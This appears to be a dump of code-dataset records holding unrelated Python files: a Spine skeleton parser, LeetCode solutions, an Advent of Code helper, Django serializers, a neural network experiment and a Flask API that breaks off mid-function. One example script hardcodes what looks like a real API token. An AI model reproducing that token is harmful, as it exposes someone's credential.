self.rvit()\n # print(slots_count)\n for i in range(slots_count):\n # print(i)\n d = {\n 'name': self.read_string(),\n 'bone': self.get_bone_name(self.rvit()),\n 'color': self.read_rgba8888(), }\n a = self.read_string()\n if a: d.update({'attachment': a})\n d.update({\n 'blend': BLEND_MODE[self.rvit()]\n })\n result.append(d)\n return result\n\n def read_float_array(self, length):\n return [self.read_float() for i in range(length)]\n\n def read_short(self):\n return struct.unpack('>h', self.read(2))[0]\n\n def read_short_array(self):\n return [self.read_short() for i in range(self.rvit())]\n\n def read_skin(self):\n slot_count = self.rvit()\n if slot_count == 0: return None\n skin_result = dict() # ['slotName']\n for i in range(slot_count):\n slot_result = dict() # ['attachmentName']\n slot_index = self.rvit()\n for ii in range(self.rvit()): # attachment count\n placeholder_name = self.read_string()\n name = self.read_string()\n if not name: name = placeholder_name\n type = ATTACHMENT_TYPE[self.read()]\n d = {\n 'name': name,\n 'type': type\n }\n if type == 'region':\n d.update({\n 'path': self.read_string(),\n 'rotation': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float(),\n 'scaleX': self.read_float(),\n 'scaleY': self.read_float(),\n 'width': self.read_float(),\n 'height': self.read_float(),\n 'color': self.read_rgba8888(), # ?\n })\n elif type == 'boundingbox':\n d.update({\n 'vertices': self.read_float_array(self.rvit() * 2),\n # 'color': self.read_rgba8888(),\n })\n elif type == 'mesh':\n d.update({\n 'path': self.read_string(),\n 'color': self.read_rgba8888(), })\n vertices_length = self.rvit() * 2\n d.update({\n 'uvs': self.read_float_array(vertices_length),\n 'triangles': self.read_short_array(),\n 'vertices': self.read_float_array(vertices_length),\n 'hull': self.rvit()})\n\n if self.nonessential:\n d.update({\n 'edges': self.read_short_array(),\n 'width': self.read_float(),\n 'height': self.read_float(),\n })\n elif type in ['linkedmesh', 'weightedlinkedmesh']:\n # print(type)\n if type == 'weightedlinkedmesh' and self.for_new:\n d.update({'type': 'linkedmesh'})\n d.update({\n 'path': self.read_string(),\n 'color': self.read_rgba8888(),\n 'skin': self.read_string(),\n 'parent': self.read_string(),\n 'deform': self.read_bool(), # inheritFFD\n })\n if self.nonessential:\n d.update({\n 'width': self.read_float(),\n 'height': self.read_float()\n })\n elif type == 'weightedmesh':\n if type == 'weightedmesh' and self.for_new:\n d.update({'type': 'mesh'})\n d.update({\n 'path': self.read_string(),\n 'color': self.read_rgba8888(), })\n vertex_count = self.rvit()\n d.update({\n 'uvs': self.read_float_array(vertex_count * 2),\n 'triangles': self.read_short_array(), })\n # complex here\n # vertices = [(bone_count,(float*4)*bone_count))*vertex_count]\n vertices = []\n for i in range(vertex_count):\n bone_count = self.read_float()\n vertices.append(bone_count)\n for ii in range(int(bone_count)):\n vertices += self.read_float_array(4)\n\n d.update({'vertices': vertices,\n 'hull': self.rvit()\n })\n if self.nonessential:\n d.update({\n 'edges': self.read_short_array(),\n 'width': self.read_float(),\n 'height': self.read_float(),\n })\n # js null\n if d.get('path') is None:\n # print('get: ',d['path'])\n d.pop('path')\n\n slot_result[placeholder_name] = d\n skin_result[self.get_slot_name(slot_index)] = slot_result\n return skin_result\n\n def handle_skins(self):\n result = dict()\n result['default'] = self.read_skin()\n self._skin_index.append('default')\n for i in 
range(self.rvit()):\n skin_name = self.read_string()\n self._skin_index.append(skin_name)\n result[skin_name] = self.read_skin()\n return result\n\n def handle_events(self):\n result = []\n for i in range(self.rvit()):\n result.append({\n 'name': self.read_string(),\n 'int': self.read_var_int(False),\n 'float': self.read_float(),\n 'string': self.read_string()\n })\n return result\n\n def handle_animations(self):\n result = dict()\n for i in range(self.rvit()):\n name = self.read_string()\n animation = {\n 'slots': dict(),\n 'bones': dict(),\n 'ik': dict(),\n 'transform': dict(),\n 'ffd': dict(),\n # 'draworder': dict(),\n # 'events': dict(),\n }\n # readAnimation\n\n # slot timelines\n for i in range(self.rvit()):\n slot_index = self.rvit()\n slot_name = self.get_slot_name(slot_index)\n animation['slots'][slot_name] = dict()\n for ii in range(self.rvit()):\n timeline_type = TIMELINE_TYPE[self.read()]\n frame_count = self.rvit()\n timeline_data = []\n if timeline_type == 'color':\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'color': self.read_rgba8888(),\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n\n timeline_data.append(d)\n elif timeline_type == 'attachment':\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'name': self.read_string()\n }\n timeline_data.append(d)\n else:\n raise NotImplementedError\n animation['slots'][slot_name][timeline_type] = timeline_data\n\n # bone timelines\n for i in range(self.rvit()):\n bone_index = self.rvit()\n bone_name = self.get_bone_name(bone_index)\n animation['bones'][bone_name] = dict()\n for ii in range(self.rvit()):\n timeline_type = TIMELINE_TYPE[self.read()]\n frame_count = self.rvit()\n timeline_data = []\n if timeline_type == 'rotate':\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'angle': self.read_float()\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n elif timeline_type in ['translate', 'scale', 'shear']:\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float()\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n else:\n raise NotImplementedError\n animation['bones'][bone_name][timeline_type] = timeline_data\n\n # ik timelines\n for i in range(self.rvit()):\n ik_index = self.rvit()\n ik_constraint_name = self._result['ik'][ik_index]['name']\n frame_count = self.rvit()\n timeline_data = []\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'mix': self.read_float(),\n 'bendPositive': (self.read_byte() == 1)\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n animation['ik'][ik_constraint_name] = timeline_data\n\n # transform\n for i in range(self.rvit()):\n transform_index = self.rvit()\n transform_constraint_name = self._result['transform'][transform_index]['name']\n frame_count = self.rvit()\n timeline_data = []\n for fi in range(frame_count):\n d = {\n 'time': self.read_float(),\n 'rotateMix': self.read_float(),\n 'translateMix': self.read_float(),\n 'scaleMix': self.read_float(),\n 'shearMix': self.read_float()\n }\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n animation['transform'][transform_constraint_name] = timeline_data\n\n # FFD\n for i in range(self.rvit()):\n skin_index = self.rvit()\n skin_name = self._skin_index[skin_index]\n skin_data = dict()\n for ii in 
range(self.rvit()):\n slot_index = self.rvit()\n slot_name = self.get_slot_name(slot_index)\n slot_data = dict()\n for iii in range(self.rvit()):\n attachment_name = self.read_string()\n frame_count = self.rvit()\n timeline_data = []\n\n for fi in range(frame_count):\n d = {\n 'time': self.read_float()\n }\n\n v_end = self.rvit()\n\n if v_end != 0:\n vertices = []\n v_start = self.rvit()\n # Java\n # end += start;\n # for (int v = start; v < end; v++) // len = end\n for _ in range(v_end):\n vertices.append(self.read_float())\n d.update({\n 'offset': v_start,\n 'vertices': vertices\n })\n\n if fi < frame_count - 1:\n d.update({'curve': self.read_curve()})\n timeline_data.append(d)\n slot_data[attachment_name] = timeline_data\n skin_data[slot_name] = slot_data\n animation['ffd'][skin_name] = skin_data\n\n # draworder\n draworder = []\n for i in range(self.rvit()):\n d = {\n 'time': self.read_float(),\n }\n offset_count = self.rvit()\n offsets = []\n for ii in range(offset_count):\n offsets.append({\n 'slot': self.get_slot_name(self.rvit()),\n 'offset': self.rvit()\n })\n d.update({\n 'offsets': offsets\n })\n draworder.append(d)\n if draworder: animation['draworder'] = draworder\n\n # event\n events = []\n for i in range(self.rvit()):\n d = {\n 'time': self.read_float(), }\n event_index = self.rvit() # eventData\n d.update({\n 'int': self.read_var_int(False),\n 'name': self._result['events'][event_index]['name'],\n 'float': self.read_float(),\n 'string': self.read_string() if self.read_bool()\n else self._result['events'][event_index]['string']\n })\n events.append(d)\n if events: # readAnimation error\n animation['events'] = events\n\n # check new (ffd->deform)\n if self.for_new:\n animation['deform'] = animation.pop('ffd')\n\n # add single animation data\n result[name] = animation\n # print(animation)\n\n return result\n\n def read_curve(self):\n curve_type = CURVE_TYPE[self.read()]\n if curve_type == 'stepped':\n return 'stepped'\n elif curve_type == 'bezier':\n return [self.read_float() for i in range(4)]\n\n def handle(self):\n self.f.seek(0)\n self._result = dict()\n self._result['skeleton'] = self.handle_skeleton()\n self._result['bones'] = self.handle_bones()\n self._result['ik'] = self.handle_ik()\n self._result['transform'] = self.handle_transform()\n self._result['slots'] = self.handle_slots()\n self._result['skins'] = self.handle_skins()\n self._result['events'] = self.handle_events()\n self._result['animations'] = self.handle_animations()\n return self._result\n\n def read_float(self):\n return struct.unpack('>f', self.read(4))[0]\n\n def read_bool(self):\n return self.read() != 0\n\n def read_byte(self):\n b = self.read()\n # print(b)\n return b - 256 if b > 127 else b\n\n def read_rgba8888(self):\n b = self.read(4)\n return '#%02x%02x%02x%02x' % (b[0], b[1], b[2], b[3])\n\n\nif __name__ == '__main__':\n result = Handler(open('data.skel', 'rb')).handle()\n # pprint.pprint(result)\n json.dump(result, open('data.json', 'w'))\n","repo_name":"CancerGary/sdorica-inspector","sub_path":"backend/api/skel2json.py","file_name":"skel2json.py","file_ext":"py","file_size_in_byte":22111,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"12453927347","text":"from typing import List\nclass Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \n n = len(matrix[0])\n \n #--1.---Using New Memory----\n\n # new_matrix = []\n # for col in zip(*matrix):\n # col1 = list(col)\n # new_matrix.append(col1)\n # # print(new_matrix)\n # 
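`read_var_int` in skel2json.py is the classic base-128 varint with an optional zigzag decode (the `result >>> 1 ^ -(result & 1)` of the quoted Java comment); the helper name `unsigned_right_shitf` is presumably a typo for `unsigned_right_shift`. A self-contained sketch over a byte stream, noting that the original additionally clamps to 5 bytes and emulates Java's 32-bit overflow, which this arbitrary-precision version omits:

from io import BytesIO

def read_varint(stream, optimize_positive=True):
    """Read a base-128 varint: low 7 bits per byte, high bit = continuation."""
    result, shift = 0, 0
    while True:
        b = stream.read(1)[0]
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            break
        shift += 7
    if not optimize_positive:
        # Zigzag decode: interleaves signed values as 0, -1, 1, -2, ...
        result = (result >> 1) ^ -(result & 1)
    return result

assert read_varint(BytesIO(b'\xac\x02')) == 300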
for i in range(n):\n # new_matrix[i].reverse()\n # return new_matrix\n\n #-------OR---2.-----Using Same Memory----\n\n # matrix = list(zip(*matrix))\n # for i in range(n):\n # matrix[i] = list(matrix[i])\n # for i in range(n):\n # matrix[i].reverse()\n # return matrix\n\n #-------OR----3.----Using Transpose---- \n\n for row in range(n):\n for col in range(row,n):\n matrix[col][row], matrix[row][col] = matrix[row][col], matrix[col][row]\n\n for i in range(n):\n matrix[i].reverse() \n return matrix\n \n\nobj = Solution()\nprint(obj.rotate([\n [ 5, 1, 9,11],\n [ 2, 4, 8,10],\n [13, 3, 6, 7],\n [15,14,12,16]\n]))","repo_name":"yashgoyl/LeetCode-Interview-Questions","sub_path":"Medium Interview Problems/Arrays and Strings/Rotate Image.py","file_name":"Rotate Image.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34036819549","text":"#!/usr/bin/env python\nfrom datetime import datetime\nimport os\nimport shutil\nimport subprocess\nimport click\n\n# Using UTC so the date is right just before the day unlocks\nTODAY = datetime.utcnow()\nROOT_PATH = os.path.dirname(os.path.realpath(__file__))\nTEMPLATE_PATH = os.path.join(ROOT_PATH, \"template.py\")\n\n\ndef validate_year(ctx, param, year):\n if year < 2015 or year > TODAY.year:\n raise click.BadParameter(f\"year should be in range [2015, {TODAY.year}]\")\n return year\n\n\ndef validate_day(ctx, param, day):\n if day < 1 or day > 25:\n raise click.BadParameter(\"day should be in range [0, 25]\")\n return day\n\n\n@click.command()\n@click.option(\"--year\", \"-y\", prompt=\"Year\", default=TODAY.year, callback=validate_year)\n@click.option(\"--day\", \"-d\", prompt=\"Day\", default=TODAY.day, callback=validate_day)\n@click.option(\"--open\", is_flag=True, default=False)\ndef main(year, day, open):\n day_path = os.path.join(ROOT_PATH, \"solutions\", f\"y{year}\", f\"d{day:02d}.py\")\n if os.path.exists(day_path):\n raise click.UsageError(f\"y{year}/d{day:02d}.py already exists\")\n\n shutil.copyfile(TEMPLATE_PATH, day_path)\n click.echo(f\"Created script for y{year}/d{day:02d}.py\")\n\n if open:\n subprocess.run(f\"code {day_path}\", shell=True, check=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Atlante45/advent-of-code","sub_path":"make_day.py","file_name":"make_day.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27443659305","text":"from pysis import SIS\nfrom pysis.exceptions import BadRequest\n\nif __name__ == \"__main__\":\n s = SIS(token=\"891fea6456f40f6369b824fb0a8ddcf0d983096f\",\n enableParamChecks=False)\n \n output = s.outputs.get(91)\n \n try:\n data = output.getData(timeStart=1412117100,\n timeEnd=1412120700,\n window=45)\n except BadRequest as ex:\n print(str(ex) + \"\\nBadRequest - OK\")\n \n \n \n \n","repo_name":"sustainableis/python-sis","sub_path":"examples/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"35947906002","text":"#Write a function that takes a string as input and returns a dictionary with the frequency of\r\n#each letter in the string.\r\n\r\ndef letter_frequency(string):\r\n frequency = {}\r\n for char in string:\r\n if char in frequency:\r\n frequency[char] += 1\r\n else:\r\n frequency[char] = 1\r\n return 
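The transpose-then-reverse rotation above also collapses to a one-liner: reversing the row order first and then zipping transposes the result, which is exactly a 90-degree clockwise rotation. Unlike option 3 in the record, this allocates new lists rather than rotating in place:

def rotate_clockwise(matrix):
    # Reverse row order, then transpose: rows become columns read bottom-up
    return [list(row) for row in zip(*matrix[::-1])]

assert rotate_clockwise([[1, 2], [3, 4]]) == [[3, 1], [4, 2]]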
frequency\r\n","repo_name":"loydlobo7/Samarthya","sub_path":"problem14.py","file_name":"problem14.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38465261729","text":"from rest_framework import serializers\nfrom store.models import Product, Order, ProductInstance, CartProductInstance\n\n\nclass ProductInstanceSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductInstance\n fields = '__all__'\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n product_instances = ProductInstanceSerializer(many=True, read_only=True)\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass CartProductInstanceSerializer(serializers.ModelSerializer):\n class Meta:\n model = CartProductInstance\n fields = '__all__'\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n cart_product_instances = CartProductInstanceSerializer(many=True)\n class Meta:\n model = Order\n fields = ('email', 'first_name', 'last_name', 'address1', 'address2',\n 'city', 'state', 'zip_code', 'card_token', 'captcha_token', 'total',\n 'cart_product_instances', 'stripe_id', 'gooten_id', 'dj_order_id')\n\n def create(self, validated_data):\n cart_product_list = validated_data.pop('cart_product_instances')\n cart_product_refs = []\n for cart_product in cart_product_list:\n obj, _ = CartProductInstance.objects.get_or_create(**cart_product)\n cart_product_refs.append(obj)\n\n order = Order.objects.create(**validated_data)\n order.cart_product_instances.set(cart_product_refs)\n return order\n","repo_name":"dmallon1/djstore-api","sub_path":"store/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71243419454","text":"from django.shortcuts import get_object_or_404\r\nfrom rest_framework import serializers\r\nfrom rest_framework.exceptions import ValidationError\r\n\r\nfrom reviews.models import (Category, Comment, Genre, Review,\r\n Title, User, UserRole)\r\n\r\n\r\nclass CategorySerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Category\r\n fields = ['name', 'slug']\r\n\r\n\r\nclass GenreSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Genre\r\n fields = ['name', 'slug']\r\n\r\n\r\nclass TitleSerializer(serializers.ModelSerializer):\r\n genre = GenreSerializer(read_only=True, many=True)\r\n category = CategorySerializer(read_only=True)\r\n rating = serializers.IntegerField(read_only=True)\r\n\r\n class Meta:\r\n model = Title\r\n fields = [\r\n 'id', 'name', 'year', 'rating', 'description', 'genre', 'category']\r\n read_only_fields = ['id', 'name', 'year', 'description']\r\n\r\n\r\nclass TitleCUDSerializer(serializers.ModelSerializer):\r\n genre = serializers.SlugRelatedField(\r\n queryset=Genre.objects.all(), slug_field='slug', many=True)\r\n category = serializers.SlugRelatedField(\r\n queryset=Category.objects.all(), slug_field='slug')\r\n\r\n class Meta:\r\n model = Title\r\n fields = ['id', 'name', 'year', 'description', 'genre', 'category']\r\n\r\n\r\nclass CommentSerializer(serializers.ModelSerializer):\r\n author = serializers.SlugRelatedField(\r\n slug_field='username',\r\n read_only=True,\r\n )\r\n review = serializers.SlugRelatedField(\r\n read_only=True,\r\n slug_field='text'\r\n )\r\n\r\n class Meta:\r\n model = Comment\r\n fields = '__all__'\r\n\r\n\r\nclass ReviewSerializer(serializers.ModelSerializer):\r\n 
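`letter_frequency` in problem14.py re-implements what the standard library's collections.Counter already provides; an equivalent usage:

from collections import Counter

assert Counter('hello') == {'h': 1, 'e': 1, 'l': 2, 'o': 1}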
author = serializers.SlugRelatedField(\r\n slug_field='username',\r\n read_only=True,\r\n default=serializers.CurrentUserDefault(),\r\n )\r\n title = serializers.SlugRelatedField(\r\n slug_field='name',\r\n read_only=True\r\n )\r\n\r\n class Meta:\r\n model = Review\r\n fields = '__all__'\r\n\r\n def validate(self, data):\r\n request = self.context['request']\r\n author = request.user\r\n title_id = self.context['view'].kwargs.get('title_id')\r\n title = get_object_or_404(Title, pk=title_id)\r\n if request.method == 'POST':\r\n if Review.objects.filter(title=title, author=author).exists():\r\n raise ValidationError(\r\n 'Вы не можете повторно подписаться на автора'\r\n )\r\n return data\r\n\r\n\r\nclass UserSerializer(serializers.ModelSerializer):\r\n username = serializers.RegexField(regex=r'^[\\w.@+-]+\\Z', max_length=150)\r\n first_name = serializers.CharField(max_length=150, required=False)\r\n last_name = serializers.CharField(max_length=150, required=False)\r\n email = serializers.CharField(max_length=254)\r\n role = serializers.ChoiceField(\r\n choices=UserRole.get_all_roles(),\r\n default=UserRole.USER.value,\r\n required=False\r\n )\r\n\r\n class Meta:\r\n fields = (\r\n 'username',\r\n 'first_name',\r\n 'last_name',\r\n 'bio',\r\n 'role',\r\n 'email'\r\n )\r\n model = User\r\n\r\n def validate_username(self, username):\r\n if username == 'me':\r\n raise serializers.ValidationError(\r\n 'Недопустимое имя пользователя!'\r\n )\r\n duplicated_username = User.objects.filter(\r\n username=username\r\n ).exists()\r\n if duplicated_username:\r\n raise serializers.ValidationError(\r\n 'Пользователь с таким именем уже зарегистрирован'\r\n )\r\n return username\r\n\r\n def validate_email(self, email):\r\n duplicated_email = User.objects.filter(email=email).exists()\r\n if duplicated_email:\r\n raise serializers.ValidationError(\r\n 'Пользователь с таким email уже зарегистрирован'\r\n )\r\n return email\r\n\r\n\r\nclass GetCodeSerializer(serializers.Serializer):\r\n email = serializers.EmailField(max_length=254, required=True)\r\n username = serializers.RegexField(regex=r'^[\\w.@+-]+\\Z', max_length=150)\r\n\r\n def validate_username(self, username):\r\n return UserSerializer.validate_username(self, username)\r\n\r\n def validate_email(self, email):\r\n return UserSerializer.validate_email(self, email)\r\n\r\n\r\nclass GetTokenSerializer(serializers.Serializer):\r\n username = serializers.CharField(required=True)\r\n confirmation_code = serializers.CharField(required=True)\r\n","repo_name":"Alexsiiassa/api_yamdb","sub_path":"api_yamdb/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"30418454907","text":"from leezy import Solution, solution\n\nfrom collections import Counter\n\nclass Q1207(Solution):\n @solution\n def uniqueOccurrences(self, arr):\n # 48ms\n cnt = Counter(arr)\n return len(set(cnt.values())) == len(cnt)\n\n\ndef main():\n q = Q1207()\n q.add_args([1, 2, 2, 1, 1, 3])\n q.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aptend/leetcode-rua","sub_path":"Python/1207 - Unique Number of Occurrences/1207_unique-number-of-occurrences.py","file_name":"1207_unique-number-of-occurrences.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37084885611","text":"from matplotlib import pyplot as plt\nimport numpy as 
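The Q1207 solution above decides uniqueness by comparing the number of distinct frequencies with the number of distinct values. A standalone version with the record's own sample input, walked through:

from collections import Counter

def unique_occurrences(arr):
    counts = Counter(arr)
    # Occurrences are unique iff no two values share a frequency
    return len(set(counts.values())) == len(counts)

assert unique_occurrences([1, 2, 2, 1, 1, 3])   # counts 3, 2, 1 are all distinct
assert not unique_occurrences([1, 2])           # both values appear once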
np\nimport functions as func\nimport models as mod\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nfrom sklearn import preprocessing\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import normalize\nimport seaborn as sns\nimport data_functions as df\nimport functions as f\n\nif __name__ == '__main__':\n\n # !!!----- Path to save down tensorboard logs -----!!!\n tb_path = \"bo_tb_logs/\"\n im_path = \"bo_images/\"\n\n # !!!----- Data distribution choices for features x -----!!!\n # For each run choose just one data distribution from ['gaussian', 'uniform', '2gaussian']\n # gaussian: symmetric gaussian with mean mu and covariance Sigma\n data_dist = 'gaussian'\n D = [300] # ambient data dimension e.g., [50,200,500]\n R = [2] # 'signal' dimension (classification depends only on the first r dimensions)\n Betas = [0.05] # proportion of corruptions, e.g., [0.01, 0.05, 0.1, 0.2]\n N = [500] # number of data points\n show_data_plot = False # Boolean, set to True to visualize data scatter diagram\n\n # !!!----- Student and teacher network choices -----!!!\n M = [500] # number of student neurons e.g., [50,200,500]\n student_type = 'Tanh'\n bias_status_list = [True, False]\n outer_train_list = [True, False]\n\n # !!!----- Optimizater choices -----!!!\n num_epochs = 12000 # Number of epochs\n plot_incs = np.concatenate((np.arange(0, 10, 1), np.arange(10, 100, 10), np.arange(100, num_epochs + 1, 100))) # Points when to compute test error etc.\n rtypes = ['none', 'fro', 'nuc'] # Choose subset of ['none', 'fro', 'nuc']\n rweights = [0.1, 0.01, 0.001] # Regularization weights to test\n step_size = 0.01\n\n # !!!----- Outcome thresholds -----!!!\n # Factors for classify different tests into categories of benign vs. 
non-benign overfit, fit or underfit.\n benign_ub = 1.2\n overfit_ub = 0.7\n fit_ub = 1.2\n\n\n for n in N:\n for m in M:\n for d in D:\n for r in R:\n # !!!----- Define teacher network ------!!!\n w_star = -(1 / np.sqrt(2)) * torch.cat((torch.ones(r), torch.zeros(d - r)))\n w_star = torch.reshape(w_star, (1, d))\n teacher = mod.One_Hidden_Layer_Model_Tanh(d, 1, bias_status = False)\n teacher.fc1.weight = nn.Parameter(w_star, requires_grad=False)\n for beta in Betas:\n if data_dist == 'gaussian':\n # Define data distribution\n num_clusters = 2 # define number of clusters\n mu = torch.cat((3*torch.ones(2), torch.zeros(d-2)), 0)\n mu = [mu, -mu] # make a list of mean vectors one for each cluster\n Sigma = torch.eye(d) # Define covariance matrix for each cluster\n train_x, train_y, test_x, test_y, num_corrupted = df.generate_data(n, d, beta, teacher, data_dist, mu=mu, Sigma=Sigma, num_clusters=num_clusters)\n else:\n print(\"data_dist_not_recognized\")\n\n # Plot to check data looks correct\n if show_data_plot:\n plot_x = train_x.numpy()\n plot_y = train_y.numpy().reshape(n)\n sns.scatterplot(plot_x[:,0], plot_x[:,1], hue=plot_y)\n plt.legend()\n plt.show()\n\n for bias_status in bias_status_list:\n for outer_train in outer_train_list:\n for l in range(len(rtypes)):\n if rtypes[l] == 'none':\n num_rweights = 1\n else:\n num_rweights = len(rweights)\n for k in range(num_rweights):\n loss_fn = mod.MSE_regularized(rtypes[l], rweights[k])\n if rtypes[l] == 'none':\n log_path = tb_path + data_dist + \"_nClusters-\" + str(num_clusters) + \"_trainOuter-\" + str(outer_train) + \"_act-\" + student_type + \"_bias-\" + str(bias_status) + \"_n\" + str(n) + \"_m\" + str(m) + \"_d\" + str(d) + \"_r\" + str(r) + \"_beta\" + str(\n beta) + \"_regtype-\" + rtypes[l]\n else:\n log_path = tb_path + data_dist + \"_nClusters-\" + str(num_clusters) + \"_trainOuter-\" + str(outer_train) + \"_act-\" + student_type + \"_bias-\" + str(bias_status) + \"_n\" + str(n) + \"_m\" + str(m) + \"_d\" + str(\n d) + \"_d\" + str(r) + \"_beta\" + str(\n beta) + \"_regtype-\" + rtypes[l] + \"_rweight-\" + str(rweights[k])\n writer = SummaryWriter(log_path)\n\n # # !!!----- Define student neuron and optimizer ------!!!\n student = mod.One_Hidden_Layer_Model_Tanh(d, m, bias_status, outer_train)\n optimizer = torch.optim.SGD(student.parameters(), step_size)\n\n student, final_test, final_train = f.train_model(writer, student, optimizer, loss_fn, train_x, train_y, test_x, test_y, num_epochs,\n num_corrupted, plot_incs, n, n, np.reshape(((w_star).detach()).numpy(), (d)))\n potential_bo = \"unlikely\"\n print(\"Training complete for following experiment run:\")\n print(log_path)\n print(\"Final train error: \" + str(final_train))\n print(\"Final test error: \" + str(final_test))\n\n if final_test <= benign_ub*beta:\n test_outcome = \"benign\"\n else:\n test_outcome = \"non-benign\"\n\n if final_train <= overfit_ub*beta:\n training_outcome = \"overfit\"\n elif final_train > overfit_ub*beta and final_train<=fit_ub*beta:\n training_outcome = \"fit\"\n else:\n training_outcome = \"underfit\"\n\n print(\"OUTCOME: \" + test_outcome + \" \" + training_outcome)\n\n\n\n\n","repo_name":"mm5110/benign-overfitting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"39476195915","text":"import copy\nfrom sqlalchemy import and_, or_, between, func, inspect\nfrom flask import jsonify, request, json, 
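The benign/overfit bookkeeping at the end of main.py can be read as a pure function of the thresholds declared under "Outcome thresholds". A sketch of that classification (function name hypothetical, thresholds taken from the record's defaults):

def classify_run(final_train, final_test, beta,
                 benign_ub=1.2, overfit_ub=0.7, fit_ub=1.2):
    # Test error within benign_ub * beta counts as benign
    test_outcome = 'benign' if final_test <= benign_ub * beta else 'non-benign'
    if final_train <= overfit_ub * beta:
        training_outcome = 'overfit'
    elif final_train <= fit_ub * beta:
        training_outcome = 'fit'
    else:
        training_outcome = 'underfit'
    return test_outcome, training_outcome

assert classify_run(0.03, 0.05, beta=0.05) == ('benign', 'overfit')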
make_response\nfrom flask_mail import Message\nfrom flask_jwt_extended import (create_access_token,\ncreate_refresh_token, jwt_required,\nget_jwt_identity, get_jti)\nfrom datetime import timedelta, datetime\n\nfrom main import app, bcrypt, jwt, mail\nfrom setup.extensions import db\nfrom models import (Test, Users, Calendar, TokenBlacklist, Beams, Organization, requests,\n Integrator, Ranges)\nfrom setup.exceptions import TokenNotFound\nfrom pdf_builder import FormBuilder\n\n# Create a range of time that an integrator has bought\n@app.route('/api/integrator/set-range', methods=['POST'])\n@jwt_required\ndef set_range():\n username = get_jwt_identity()\n req = request.get_json()\n result = \"\"\n\n try:\n user = Users.query.filter_by(username=username).first()\n if user.user_type != 'Integrator':\n raise Exception(\"You must be an integrator to view this page!\")\n myOrg = Organization.query.filter_by(abbrv=user.affiliation).first()\n startDate = req['startDate']\n startTime = req['startTime']\n date = datetime.strptime(startDate, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n time = datetime.strptime(startTime, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n timeDelta = timedelta(hours = time.hour, minutes = time.minute)\n date = date + timeDelta\n entry = Ranges(org_id=myOrg.id, start_date=date, hours=req['hours'],\n facility=req['facility'], scheduled=False)\n result = entry.create_range()\n\n return jsonify({'success': True}), 200\n\n except Exception as e:\n print(e)\n result = {'error' : str(e),\n 'success' : False}\n\n return jsonify(result)\n\n# Gets ranges\n@app.route('/api/integrator/get-range', methods=['GET'])\n@jwt_required\ndef get_range():\n username = get_jwt_identity()\n result = \"\"\n\n try:\n user = Users.query.filter_by(username=username).first()\n if user.user_type != 'Integrator':\n raise Exception(\"You must be an integrator to view this page!\")\n myOrg = Organization.query.filter_by(abbrv=user.affiliation).first()\n myList = []\n ranges = Ranges.query.filter_by(org_id=myOrg.id).all()\n for rang in ranges:\n timeDelta = timedelta(hours = rang.hours)\n end = rang.start_date + timeDelta\n start = rang.start_date.strftime(\"%Y-%m-%dT%H:%M:%S\")\n end = end.strftime(\"%Y-%m-%dT%H:%M:%S\")\n entry = {\"facility\" : rang.facility, \"hours\" : rang.hours,\n \"startDate\" : start, \"endDate\" : end, \"id\" : rang.id, \"scheduled\" : rang.scheduled}\n myList.append(entry)\n\n return {\"ranges\" : myList}, 200\n\n except Exception as e:\n print(e)\n result = {'error' : str(e),\n 'success' : False}\n\n return jsonify(result)\n\n# Sets priority for requests to be scheduled\n# Handled in frontend so depreciated\n@app.route('/api/request/priority', methods=['POST'])\n@jwt_required\ndef set_priority():\n result = \"\"\n req = request.get_json()\n\n try:\n beam_requests = requests.query.filter(requests.id.in_(req['ids']))\n if req['add']:\n for form in beam_requests:\n form.priority = True\n else:\n for form in beam_requests:\n form.priority = False\n\n db.session.commit()\n \n result = {'success' : 